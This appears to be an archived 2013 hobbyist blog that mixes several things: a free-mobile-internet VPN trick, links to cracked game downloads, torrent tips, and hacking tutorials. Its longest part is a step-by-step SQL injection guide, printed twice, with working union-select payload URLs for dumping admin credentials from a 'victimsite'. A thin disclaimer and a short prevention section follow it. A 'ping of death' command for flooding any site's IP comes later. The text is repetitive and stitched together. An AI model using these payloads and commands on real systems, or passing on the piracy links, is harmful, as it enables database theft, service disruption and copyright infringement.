FREE INTERNET FOR EVERYONE
One of the buzzwords in the world of the Internet is the Virtual Private Network, or VPN.
The growing popularity of these useful and very clever resources is not
to be underestimated, but what is the fuss all about, and how do you
choose between the many players in the market? Put simply a VPN is a
network of computers connected via the Internet: it can be used for many
purposes, and in our case we are primarily concerned with security.
Internet security is of paramount importance to everyone – whether in
business or in a private capacity – and there are many who advocate the
use of a VPN as an essential aspect of online security. Let’s have a
closer look at why you need to use a VPN, what to look for when choosing
one, and how to tell if you are getting the best service for your
needs.
So here is what you need.
1. A VPN software
2. A 3G activated line
3. Active data plan. (preferably 4mb)
So the first thing you do is download a VPN software. Personally i use hotspot sheild. But you can you PD-Proxy as an alternative
Sign up for a free account with the VPN software of choice. U've got to be creative guys, So many VPN softwares out there!!
Install the software and log in to their servers with your username and passowrd.
Depending on which software you are using, you can either enter port manually or let the software fill in the ports for you automatically. Then click connect.
But remember to set your ISP free homepage to your dial up profile settings.
Depending on your account with the VPN providers, you can get unlimited internet access for free!!
Personally i've tried this and it works for safaricom, airtel and orange networks!
Post a comment if you get problems.
Wednesday 28 August 2013
Monday 12 August 2013
How To Download Torrents With IDM Quickly
How To Download Torrents With IDM Quickly
May 1, 2013 Hey Techies!Hope you enjoyed my last post – “How To Find Windows 7 Product Key”. Today mine one friend asked a query about how to download torrents with IDM faster. So, here my next post comes on How To Download Torrents With IDM Quickly. Torrents are simply a huge server or host used to download songs, videos, movies, games and some other big files, but the torrent applicants or torrent clients are very lazy and have slow speed. Accordingly today I am going to disclose you How to download torrents with IDM. IDM (Internet Download Manager) is considered as the most excellent or best download manager.
Benefits of Downloading Torrent Files via IDM –
- IDM is known as one of the excellent download manager which works at a faster speed.
- Via IDM at your school or college you can download torrents as to connect with internet it uses proxy.
How To Download Torrents With IDM Quickly
How to Download Torrents with IDM through Zbigz Quickly –
Step 1. Firstly you have to download the desired game, song, video, software or anything you want to download with IDM.Step 2. Then go to Zbigz.com and register an account there. It offers two types of facilities free or premium select one as you wish.
Step 3. Now Upload Torrent to Zbigz and hit the Go button.
Step 4. Then proceeding with it next will ask you to select from Free or Premium option. Choose the one suitable option for you.
Step 5. Now Zbigz will start caching your torrent, it may take some time and your speed of internet connection is the main factor in the time taken for it to cache your torrent.
Step 6. Now If you have IDM installed, it will start downloading torrent at a very quick speed.
Follow the above steps properly to download torrents with IDM quickly
Thursday 27 June 2013
HITMAN 4 DOWNLOAD
Hitman 4: Blood Money
Hitman: Blood Money
- Developer: Io Interactive
- Publisher: Eidos Interactive
- Genre: Action
- Release Date: May 30, 2006 (US)
About Hitman: Blood Money
The fourth in the chilling Hitman series featuring the cold-blooded killer Agent 47. Finding that members of his contract agency, The ICA, are now being quietly (and mortally) eliminated, Agent 47 suspects a larger organization is moving in. Fearing he may be the next target, he heads to America. His jobs now will pay in straight-up cash -- and how he spends the money will affect what weapons he has and what he does next. The developer added new gameplay systems, such as the concepts of notoriety and of blood money. The new Notoriety system means that anyone causing a bloodbath worthy of front page news is risking being recognised by civilians and guards in the future. Blood money lets players spend their earnings on fully customisable precision weapons and specialist equipment, or they can buy additional information upon the targets and location at hand, to aid a successful and professional hit.
Minimum System Requirements
- OS: Windows 2000/XP
- Processor: Pentium 4 @ 1.5 GHz
- Memory: 512 Mb
- Hard Drive: 5 Gb free
- Video Memory: 128 Mb
- Sound Card: DirectX Compatible
- DirectX: 9.0c
- Keyboard
- Mouse
- DVD Rom Drive
Download Hitman: Blood Money – Direct Links
Part 1 – 700 MB
Part 2 – 700 MB
Part 3 – 700 MB
Part 4 – 700 MB
Part 5 – 700 MB
Part 6 – 700 MB
Part 7 – 103 MB
CRACK
TRANSFORMERS: WAR FOR CYBERTRON DOWNLOAD
Transformers: War for Cybertron
Transformers: War for Cybertron
- Developer: High Moon Studios
- Publisher: Activision
- Genre: Shooter
- Release Date: June 22, 2010 (US)
About Transformers: War for Cybertron
Transformers: War for Cybertron challenges players to become the ultimate weapon as a Transformers character in the final, epic war that will determine the survival of their entire race. Armed with a diverse arsenal of lethal, high-tech weaponry and the ability to instantly convert from robot to vehicle at any time, players will engage in heart-pounding battles on land and in the air in this gripping, 3rd person action shooter set in the Transformers' war-ravaged homeland.
System Requirements
- OS: Windows XP, Vista or Windows 7
- CPU: Intel Core 2 Duo E4300 at 1.8 GHz / AMD Athlon 64 x2 Dual Core 4000
- RAM: 2 GB
- HDD: 9 GB free disk space
- Graphics: 256 MB Graphics Memory
- Sound Card: DirectX 9 Compatible
- DirectX: Version 9.0c
Download Transformers: War for Cybertron – Direct Links
Part 01 – 700 MB
Part 02 – 700 MB
Part 03 – 700 MB
Part 04 – 700 MB
Part 05 – 700 MB
Part 06 – 700 MB
Part 07 – 700 MB
Part 08 – 700 MB
Part 09– 700 MB
Part 10 – 700 MB
Part 11 – 700 MB
Part 12 – 107 MB
Sunday 2 June 2013
NEED FOR SPEED: HOT PURSUIT DOWNLOAD
Need for Speed: Hot Pursuit
Need for Speed: Hot Pursuit
- Developer: Criterion Games
- Publisher: Electronic Arts
- Genre: Racing
- Release Date: November 16, 2010 (US)
About Need for Speed: Hot Pursuit
Need for Speed Hot Pursuit brings the franchise back to its roots with intense cops vs. racer chases.The game features Need for Speed Autolog where players compare racing stats and automatically get personalized gameplay recommendations from their friends. Need for Speed Hot Pursuit players can also experience the thrill of the chase and the rush of the escape as they play through full careers as both a cop and a racer - solo or connected. The high speed busts and heart-stopping getaways are all connected via Need for Speed Autolog.
Minimum System Requirements
- OS: Windows XP/Vista/7
- Processor: Intel Core 2 Duo @ 1.8 Ghz / AMD Athlon 64 X2 4000+
- Memory: 1 Gb
- Hard Drive: 8.3 Gb free
- Video Memory: 256 Mb
- Video Card: nVidia GeForce 7800 / ATI Radeon X1900
- Sound Card: DirectX Compatible
- Network: Broadband Internet Connection for Online Multiplayer
- DirectX: 9.0c
- Keyboard
- Mouse
- DVD Rom Drive
Recommended System Requirements
- OS: Windows XP/Vista/7
- Processor: Intel Core 2 Duo @ 2.8 GHz / AMD Phenom II X3 720 @ 2.8 GHz
- Memory: 2 Gb
- Hard Drive: 8.3 Gb free
- Video Memory: 1 Gb
- Video Card: nVidia GeForce 9800 / ATI Radeon HD 4850
- Sound Card: DirectX Compatible
- Network: Broadband Internet Connection for Online Multiplayer
- DirectX: 9.0c
- Keyboard
- Mouse
- DVD Rom Drive
Download Need for Speed: Hot Pursuit – Direct Links
Part 1 – 700 MB
Part 2 – 700 MB
Part 3 – 700 MB
Part 4 – 700 MB
Part 5 – 700 MB
Part 6 – 700 MB
Part 7 – 700 MB
Part 8 – 700 MB
Part 9 – 700 MB
Part 10 – 700 MB
Part 11 – 700 MB
Part 12 – 332 MB
CRACK
Saturday 25 May 2013
SAINTS ROW THE THIRD 8.5GB
Saints Row: The Third - PC Game
Saints Row: The Third
- Developer: Volition
- Publisher: THQ
- Genre: Action
- Release Date: November 15, 2011 (US)
Saints Row: The Third
Years after taking Stilwater for their own, the Third Street Saints have evolved from street gang to household brand name, with Saints sneakers, Saints energy drinks and Johnny Gat bobble head dolls all available at a store near you. The Saints are kings of Stilwater, but their celebrity status has not gone unnoticed. The Syndicate, a legendary criminal fraternity with pawns in play all over the globe, has turned its eye on the Saints and demands tribute.
Minimum System Requirements
- OS: Windows XP/Vista/7
- Processor: Intel Core 2 Duo @ 2.0 Ghz / AMD Athlon 64 X2 4200+
- Memory: 2 Gb
- Hard Drive: 15 Gb free
- Video Memory: 256 Mb
- Video Card: nVidia GeForce 8600 / ATI Radeon HD 2600 Pro
- Sound Card: DirectX Compatible
- Network: Broadband Internet Connection for Online Multiplayer
- DirectX: 9.0c
- Keyboard
- Mouse
- DVD Rom Drive
Recommended System Requirements
- OS: Windows 7
- Processor: Intel Core i5 @ 2.66 GHz / AMD Phenom II X4 @ 2.8 GHz
- Memory: 4 Gb
- Hard Drive: 15 Gb free
- Video Memory: 1 Gb
- Video Card: nVidia GeForce GTX 460 / ATI Radeon HD 5850
- Sound Card: DirectX Compatible
- Network: Broadband Internet Connection for Online Multiplayer
- DirectX: 10
- Keyboard
- Mouse
- DVD Rom Drive
Download Saints Row: The Third – Direct Links
Part 1 – 700 MB
Part 2 – 700 MB
Part 3 – 700 MB
Part 4 – 700 MB
Part 5 – 700 MB
Part 6 – 700 MB
Part 7 – 700 MB
Part 8 – 700 MB
Part 9 – 700 MB
Part 10 – 700 MB
Part 11 – 700 MB
Part 12 – 700 MB
Part 13 – 167 MB
Crack
Tuesday 21 May 2013
HOW TO DOWNLOAD
How to Download
Hi Gamers,
While you are at the download website, which is FREE unless you wanna support us "Click on Ads".
1) Scroll down. Wait 10 Seconds before your actual download link is available.
2) Next you'll be redirected to another page where the download link is. Click on "Bingo!"
ASSASIN'S CREED BROTHERHOOD.
READ THE "HOW TO DOWNLOAD SECTION" IF U GET ANY TROUBLE!!
Assassin's Creed: Brotherhood
Assassin's Creed: Brotherhood
- Publisher: Ubisoft
- Developer: Ubisoft Montreal
- Release Date: March 17, 2010 (US)
- Genre: Action
Assassin’s Creed Brotherhood Minimum System RequirementsNow a legendary Master Assassin, Ezio must journey into Italy's greatest city, Rome, center of power, greed and corruption to strike at the heart of the enemy. Defeating the corrupt tyrants entrenched there will require not only strength, but leadership, as Ezio commands an entire Brotherhood that will rally to his side. Only by working together can the Assassins defeat their mortal enemies.
- OS: Windows® XP (32-64 bits) /Windows Vista®(32-64 bits)/Windows 7® (32-64 bits)
- CPU: Intel Core® 2 Duo 1.8 GHZ or AMD Athlon X2 64 2.4GHZ
- RAM: 1.5 GB Windows® XP / 2 GB Windows Vista® - Windows 7®
- VIDEO: 256 MB DirectX® 9.0-compliant card with Shader Model 3.0 or higher (see supported list*)
- DX: 9.0
- HARD DRIVE: 8 GB
- SOUND: DirectX 9.0 -compliant sound card
- PERIPHERALS: Keyboard, mouse, optional controller
- Supported Video Cards: ATI® RADEON® HD 2000/3000/4000/5000/6000 series, NVIDIA GeForce® 8/9/100/200/300/400/500 series
- Note* * This product does not support Windows® 98/ME/2000/NT
- OS: Windows® XP (32-64 bits) /Windows Vista®(32-64 bits)/Windows 7® (32-64 bits)
- CPU: Intel Core® 2 Duo E6700 2.6 GHz or AMD Athlon 64 X2 6000+ or better
- RAM: 1.5 GB Windows® XP / 2 GB Windows Vista® - Windows 7®
- VIDEO: GeForce 8800 GT or ATI Radeon HD 4700 or better
- SOUND: 5.1 sound card
- PERIPHERALS: joystick optional (Xbox 360® Controller for Windows recommended)
- Supported Video Cards: ATI® RADEON® HD 2000/3000/4000/5000/6000 series, NVIDIA GeForce® 8/9/100/200/300/400/500 series
- Note* * This product does not support Windows® 98/ME/2000/NT
Download Assassin's Creed: Brotherhood – Direct Links
CRACK
If you like this game. Like us on facebook.
Monday 20 May 2013
HOW TO EXECUTE AN SQL INJECTION
What is SQL Injection?
SQL injection is one of the popular web application hacking method. Using the SQL Injection attack, an unauthorized person can access the database of the website. Attacker can extract the data from the Database.
What a hacker can do with SQL Injection attack?
* ByPassing Logins
* Accessing secret data
* Modifying contents of website
* Shutting down the My SQL server
So, here we go.
Step 1: Finding Vulnerable Website:
To find a SQL Injection vulnerable site, you can use Google search by searching for certain keywords. Those keyword often referred as 'Google dork'.
Some Examples:
inurl:index.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:pageid=
Here is the huge list of Google Dork
http://www.ziddu.com/download/13161874/A...t.zip.html
Copy one of the above keyword and paste in the google. Here , we will got lot search result with
We have to visit the websites one by one for checking the vulnerability.
Note:if you like to hack particular website,then try this:
site:www.victimsite.com dork_list_commands
for eg:
Now let us check the vulnerability of the target website. To check the vulnerability , add the single quotes(') at the end of the url and hit enter.
For eg:
If you got an error message just like this, then it means that the site is vulnerable
Step 3: Finding Number of columns:
Great, we have found that the website is vulnerable to SQLi attack. Our next step is to find the number of columns present in the target database.
For that replace the single quotes(') with "order by n" statement.
Change the n from 1,2,3,4,,5,6,...n. Until you get the error like "unknown column ".
For eg:
I mean:
In case ,if the above method fails to work for you, then try to add the "--" at the end of the statement.
For eg:
Step 4: Find the Vulnerable columns:
We have successfully discovered the number of columns present in the target database. Let us find the vulnerable column by trying the query "union select columns_sequence".
Change the id value to negative(i mean id=-2). Replace the columns_sequence with the no from 1 to x-1(number of columns) separated with commas(,).
For eg:
if the number of columns is 7 ,then the query is as follow:
Bingo, column '3' and '7' are found to be vulnerable. Let us take the first vulnerable column '3' . We can inject our query in this column.
Step 5: Finding version,database,user
Replace the 3 from the query with "version()"
For eg:
Replace the version() with database() and user() for finding the database,user respectively.
For eg:
If the above is not working,then try this:
Step 6: Finding the Table Name
If the Database version is 5 or above. If the version is 4.x, then you have to guess the table names (blind sql injection attack).
Let us find the table name of the database. Replace the 3 with "group_concat(table_name) and add the "from information_schema.tables where table_schema=database()"
For eg:
Let us choose the "admin " table.
Step 7: Finding the Column Name
Now replace the "group_concat(table_name) with the "group_concat(column_name)"
Replace the "from information_schema.tables where table_schema=database()--" with "FROM information_schema.columns WHERE table_name=mysqlchar--
We have to convert the table name to MySql CHAR() string .
Install the HackBar addon:
https://addons.mozilla.org/en-US/firefox/addon/3899/
Once you installed the add-on, you can see a toolbar that will look like the following one. If you are not able to see the Hackbar, then press F9.
Select sql->Mysql->MysqlChar() in the Hackbar.
It will ask you to enter string that you want to convert to MySQLCHAR(). We want to convert the table name to MySQLChar . In our case the table name is 'admin'.
Now you can see the CHAR(numbers separated with commans) in the Hack toolbar.
Copy and paste the code at the end of the url instead of the "mysqlchar"
For eg:
For example: admin,password,admin_id,admin_name,admin_password,active,id,admin_name,admin_pas s,admin_id,admin_name,admin_password,ID_admin,admin_username,username,password..etc..
Now replace the replace group_concat(column_name) with group_concat(columnname1,0x3a,anothercolumnname2).
Now replace the " from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)" with the "from table_name"
For eg:
If we got luck, then it will display the data stored in the database depending on your column name. For instance, username and password column will display the login credentials stored in the database.
Step 8: Finding the Admin Panel:
Just try with url like:
If you got luck ,you will find the admin page using above urls. or you can some kind of admin finder tools.
SQL injection is one of the popular web application hacking method. Using the SQL Injection attack, an unauthorized person can access the database of the website. Attacker can extract the data from the Database.
What a hacker can do with SQL Injection attack?
* ByPassing Logins
* Accessing secret data
* Modifying contents of website
* Shutting down the My SQL server
So, here we go.
Step 1: Finding Vulnerable Website:
To find a SQL Injection vulnerable site, you can use Google search by searching for certain keywords. Those keyword often referred as 'Google dork'.
Some Examples:
inurl:index.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:pageid=
Here is the huge list of Google Dork
http://www.ziddu.com/download/13161874/A...t.zip.html
We have to visit the websites one by one for checking the vulnerability.
Note:if you like to hack particular website,then try this:
site:www.victimsite.com dork_list_commands
for eg:
site:www.victimsite.com inurl:index.php?id=Step 2: Checking the Vulnerability:
Now let us check the vulnerability of the target website. To check the vulnerability , add the single quotes(') at the end of the url and hit enter.
For eg:
http://www.victimsite.com/index.php?id=2'
If the page remains in same page or showing that page not found, then it is not vulnerable. If you got an error message just like this, then it means that the site is vulnerable
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1
Step 3: Finding Number of columns:
Great, we have found that the website is vulnerable to SQLi attack. Our next step is to find the number of columns present in the target database.
For that replace the single quotes(') with "order by n" statement.
Change the n from 1,2,3,4,,5,6,...n. Until you get the error like "unknown column ".
For eg:
If you get the error while trying the "x"th number,then no of column is "x-1".http://www.victimsite.com/index.php?id=2 order by 1
http://www.victimsite.com/index.php?id=2 order by 2
http://www.victimsite.com/index.php?id=2 order by 3
http://www.victimsite.com/index.php?id=2 order by 4
I mean:
so now x=8 , The number of column is x-1 i.e, 7.http://www.victimsite.com/index.php?id=2 order by 1(noerror)
http://www.victimsite.com/index.php?id=2 order by 2(noerror)
http://www.victimsite.com/index.php?id=2 order by 3(noerror)
http://www.victimsite.com/index.php?id=2 order by 4(noerror)
http://www.victimsite.com/index.php?id=2 order by 5(noerror)
http://www.victimsite.com/index.php?id=2 order by 6(noerror)
http://www.victimsite.com/index.php?id=2 order by 7(noerror)
http://www.victimsite.com/index.php?id=2 order by 8(error)
In case ,if the above method fails to work for you, then try to add the "--" at the end of the statement.
For eg:
http://www.victimsite.com/index.php?id=2 order by 1--
Step 4: Find the Vulnerable columns:
We have successfully discovered the number of columns present in the target database. Let us find the vulnerable column by trying the query "union select columns_sequence".
Change the id value to negative(i mean id=-2). Replace the columns_sequence with the no from 1 to x-1(number of columns) separated with commas(,).
For eg:
if the number of columns is 7 ,then the query is as follow:
http://www.victimsite.com/index.php?id=-2 union select 1,2,3,4,5,6,7--
If the above method is not working then try this:
http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,3,4,5,6,7--
Once you execute the query, it will display the vulnerable column.Bingo, column '3' and '7' are found to be vulnerable. Let us take the first vulnerable column '3' . We can inject our query in this column.
Step 5: Finding version,database,user
Replace the 3 from the query with "version()"
For eg:
http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,version(),4,5,6,7--
Now, It will display the version as 5.0.1 or 4.3. something like this.Replace the version() with database() and user() for finding the database,user respectively.
For eg:
http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,database(),4,5,6,7--
http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,user(),4,5,6,7--
If the above is not working,then try this:
http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,unhex(hex(@@version)),4,5,6,7--
Step 6: Finding the Table Name
If the Database version is 5 or above. If the version is 4.x, then you have to guess the table names (blind sql injection attack).
Let us find the table name of the database. Replace the 3 with "group_concat(table_name) and add the "from information_schema.tables where table_schema=database()"
For eg:
Now it will display the list of table names. Find the table name which is related with the admin or user.
http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,group_concat(table_name),4,5,6,7 from information_schema.tables where table_schema=database()--
Let us choose the "admin " table.
Step 7: Finding the Column Name
Now replace the "group_concat(table_name) with the "group_concat(column_name)"
Replace the "from information_schema.tables where table_schema=database()--" with "FROM information_schema.columns WHERE table_name=mysqlchar--
We have to convert the table name to MySql CHAR() string .
Install the HackBar addon:
https://addons.mozilla.org/en-US/firefox/addon/3899/
Once you installed the add-on, you can see a toolbar that will look like the following one. If you are not able to see the Hackbar, then press F9.
Select sql->Mysql->MysqlChar() in the Hackbar.
It will ask you to enter string that you want to convert to MySQLCHAR(). We want to convert the table name to MySQLChar . In our case the table name is 'admin'.
Now you can see the CHAR(numbers separated with commans) in the Hack toolbar.
Copy and paste the code at the end of the url instead of the "mysqlchar"
For eg:
http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,group_concat(column_name),4,5,6,7 from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)--The above query will display the list of column.
For example: admin,password,admin_id,admin_name,admin_password,active,id,admin_name,admin_pas s,admin_id,admin_name,admin_password,ID_admin,admin_username,username,password..etc..
Now replace the replace group_concat(column_name) with group_concat(columnname1,0x3a,anothercolumnname2).
Now replace the " from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)" with the "from table_name"
For eg:
http://www.victimsite.com/index.php?id=-2
and 1=2 union select 1,2,group_concat(admin_id,0x3a,admin_password),4,5,6,7 from admin--
If the above query displays the 'column is not found' erro, then try another column name from the list.If we got luck, then it will display the data stored in the database depending on your column name. For instance, username and password column will display the login credentials stored in the database.
Step 8: Finding the Admin Panel:
Just try with url like:
http://www.victimsite.com/admin.php
http://www.victimsite.com/admin/
http://www.victimsite.com/admin.html
http://www.victimsite.com:2082/
etc.If you got luck ,you will find the admin page using above urls. or you can some kind of admin finder tools.
Warning:
The above post is completely for educational purpose only. Never attempt to follow the above steps against third-party websites. If you want to learn SQL injection attack method , then you can learn in safe environment by setup your own lab.
The above post is completely for educational purpose only. Never attempt to follow the above steps against third-party websites. If you want to learn SQL injection attack method , then you can learn in safe environment by setup your own lab.
In this article, i just explained how to attack SQL injection vulnerable site in a n00b(newbie) way. If you want to become PenTester, you must know how these attacks works. In my next article, i will explain the SQL Injection depth.
Injection Prevention - mysql_real_escape_string()
Lucky for you, this problem has been known for a while and PHP has a specially-made function to prevent these attacks. All you need to do is use the mouthful of a function mysql_real_escape_string.What mysql_real_escape_string does is take a string that is going to be used in a MySQL query and return the same string with all SQL Injection attempts safely escaped. Basically, it will replace those troublesome quotes(') a user might enter with a MySQL-safe substitute, an escaped quote \'.
Lets try out this function on our two previous injection attacks and see how it works.
MySQL & PHP Code:
//NOTE: you must be connected to the database to use this function! // connect to MySQL $name_bad = "' OR 1'"; $name_bad = mysql_real_escape_string($name_bad); $query_bad = "SELECT * FROM customers WHERE username = '$name_bad'"; echo "Escaped Bad Injection: <br />" . $query_bad . "<br />"; $name_evil = "'; DELETE FROM customers WHERE 1 or username = '"; $name_evil = mysql_real_escape_string($name_evil); $query_evil = "SELECT * FROM customers WHERE username = '$name_evil'"; echo "Escaped Evil Injection: <br />" . $query_evil;
Display:
Escaped Bad Injection:
SELECT * FROM customers WHERE username = '\' OR 1\''
Escaped Evil Injection:
SELECT * FROM customers WHERE username = '\'; DELETE FROM customers WHERE 1 or username = \''
Notice that those evil quotes have been escaped with a backslash \, preventing the injection attack. Now
all these queries will do is try to find a username that is just completely ridiculous:SELECT * FROM customers WHERE username = '\' OR 1\''
Escaped Evil Injection:
SELECT * FROM customers WHERE username = '\'; DELETE FROM customers WHERE 1 or username = \''
- Bad: \' OR 1\'
- Evil: \'; DELETE FROM customers WHERE 1 or username = \'
http://205.196.122.54/2wuk42tlasxg/0a2h0r7qr5326da/002-+Rihanna+-+Diamonds.mp3
http://205.196.122.20/psxnnfbhb5lg/0a2h0r7qr5326da/002-+Rihanna+-+Diamonds.mp3
<a href="http://www.mediafire.com/folder/ltb27b1y5885o/Music" target="_blank">http://www.mediafire.com/folder/ltb27b1y5885o/Music</a>
http://www.mediafire.com/folder/ltb27b1y5885o/Music
http://3klinks.com/m1.php?id=4821
Sunday 19 May 2013
HOW TO CARRY OUT A DENIAL OF SERVICE ATTACK!!
Before you can attempt this you need to know alittle about DoS.
What is a denial-of-service (DoS) attack?
In a denial-of-service (DoS) attack, an attacker attempts to prevent legitimate users from accessing information or services. By targeting your computer and its network connection, or the computers and network of the sites you are trying to use, an attacker may be able to prevent you from accessing email, websites, online accounts (banking, etc.), or other services that rely on the affected computer.The most common and obvious type of DoS attack occurs when an attacker "floods" a network with information. When you type a URL for a particular website into your browser, you are sending a request to that site's computer server to view the page. The server can only process a certain number of requests at once, so if an attacker overloads the server with requests, it can't process your request. This is a "denial of service" because you can't access that site.
An attacker can use spam email messages to launch a similar attack on your email account. Whether you have an email account supplied by your employer or one available through a free service such as Yahoo or Hotmail, you are assigned a specific quota, which limits the amount of data you can have in your account at any given time. By sending many, or large, email messages to the account, an attacker can consume your quota, preventing you from receiving legitimate messages.
What is a distributed denial-of-service (DDoS) attack?
In
a distributed denial-of-service (DDoS) attack, an attacker may use your
computer to attack another computer. By taking advantage of security
vulnerabilities or weaknesses, an attacker could take control of your
computer. He or she could then force your computer to send huge amounts
of data to a website or send spam to particular email addresses. The
attack is "distributed" because the attacker is using multiple
computers, including yours, to launch the denial-of-service attack.How do you avoid being part of the problem?
Unfortunately, there are no effective ways to prevent being the victim of a DoS or DDoS attack, but there are steps you can take to reduce the likelihood that an attacker will use your computer to attack other computers:- Install and maintain anti-virus software (see Understanding Anti-Virus Software for more information).
- Install a firewall, and configure it to restrict traffic coming into and leaving your computer (see Understanding Firewalls for more information).
- Follow good security practices for distributing your email address (see Reducing Spam for more information). Applying email filters may help you manage unwanted traffic.
How do you know if an attack is happening?
Not
all disruptions to service are the result of a denial-of-service
attack. There may be technical problems with a particular network, or
system administrators may be performing maintenance. However, the
following symptoms could indicate a DoS or DDoS attack:- unusually slow network performance (opening files or accessing websites)
- unavailability of a particular website
- inability to access any website
- dramatic increase in the amount of spam you receive in your account
What do you do if you think you are experiencing an attack?
Even if you do correctly identify a DoS or DDoS attack, it is unlikely that you will be able to determine the actual target or source of the attack. Contact the appropriate technical professionals for assistance.- If you notice that you cannot access your own files or reach any external websites from your work computer, contact your network administrators. This may indicate that your computer or your organization's network is being attacked.
- If you are having a similar experience on your home computer, consider contacting your internet service provider (ISP). If there is a problem, the ISP might be able to advise you of an appropriate course of action.
How To Carry Out DoS Attack With CMD !!
DoS attackes can target end-user systems, servers, routers and Network links(websites)Requirments:
1- Command Prompt (CMD or DOS) Which is usually integrated in all Windows.
2- Ip-Address of Targeted Site.
How TO GET IP OF ANY SITE??
No problem.. here is the solution..
open ur CMD (command prompt).. and type
————————————————–
nslookup Site-Name
————————————————–
(e.g nslookup www.google.com)
It will show u ip of the site.
ohk now write this command in CMD For Attack on Any Site/ Server..
—————————————————
ping SITE-IP -l 65500 -n 10000000 -w 0.00001
—————————————————
-n 10000000= the number of DoS attemps.. u can change the value “10000000″ with ur desired value u want to attempt attack.
SITE-IP= Replace the text with the ip address of the site u want to be attacked..
-w 0.00001 = It is the waiting time after one ping attack.
NOTE: Dont Change or Remove -l, -n and -w in this command.. otherwise u will not able to attack!!
—————
This All System Is Known As “PING OF DEATH”
—————
Subscribe to:
Posts (Atom)